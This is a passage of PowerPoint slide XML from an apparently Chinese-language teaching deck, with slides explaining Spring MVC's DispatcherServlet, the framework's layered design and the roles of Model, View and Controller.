                  <a:t>中心控制器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>:</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Spring MVC</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>框架像许多其他</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>MVC</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>框架一样</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>, </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>以请求为驱动 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>, </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>围绕一个中心</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>DispatcherServlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>分派请求及提供其他功能。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>优势：</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="874395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>实现前后端分离</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="874395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>分层设计，实现业务层各组件解耦，有利于扩展，维护</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="-apple-system"/>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="-apple-system"/>
                  <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823315"/>
                <a:ext cx="1856378" cy="346683"/>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b="1" dirty="0" err="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SpringMVC</a:t>
                </a:r>
                <a:endPar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4" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943694" y="1721922"/>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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="!!sf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550378" y="3532146"/>
            <a:ext cx="4664872" cy="2661169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 7"/>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8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091960" y="4075492"/>
            <a:ext cx="3985226" cy="2546404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="699650" y="1319340"/>
            <a:ext cx="10897619" cy="2756152"/>
            <a:chOff x="795583" y="1703810"/>
            <a:chExt cx="11832090" cy="3463610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="795583" y="1703810"/>
              <a:ext cx="11832090" cy="3463610"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="11602280" cy="3463610"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823318"/>
                <a:ext cx="11602280" cy="3463607"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 5462"/>
                  <a:gd name="adj2" fmla="val 2825"/>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504000" bIns="0" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="1500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介绍：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>MVC</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>是模型</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Model)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>视图</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>View)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>控制器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Controller)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>的简写，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>一种软件架构模式</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817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Model</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>模型）：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>数据模型，提供要展示的数据，因此包含数据和行为，可以认为是领域模型或</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>JavaBean</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>组件（包含数据和行为），不过现在一般都分离开来：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Value Object</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>数据</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Dao</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>） </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>和 服务层（行为</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Service</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>）。</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>也就是模型提供了模型数据查询和模型数据的状态更新等功能，包括数据和业务。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>View</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>视图）：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>负责进行模型的展示，一般就是我们见到的用户界面，客户想看到的东西。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Controller</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181818"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>控制器）：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>接收用户请求，委托给模型进行处理（状态改变），处理完毕后把返回的模型数据返回给视图，由视图负责展示。 也就是说控制器做了个调度员的工作。</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矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920212" y="1823315"/>
                <a:ext cx="1171378" cy="431493"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 22684"/>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MVC</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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1" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="942075" y="1779826"/>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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
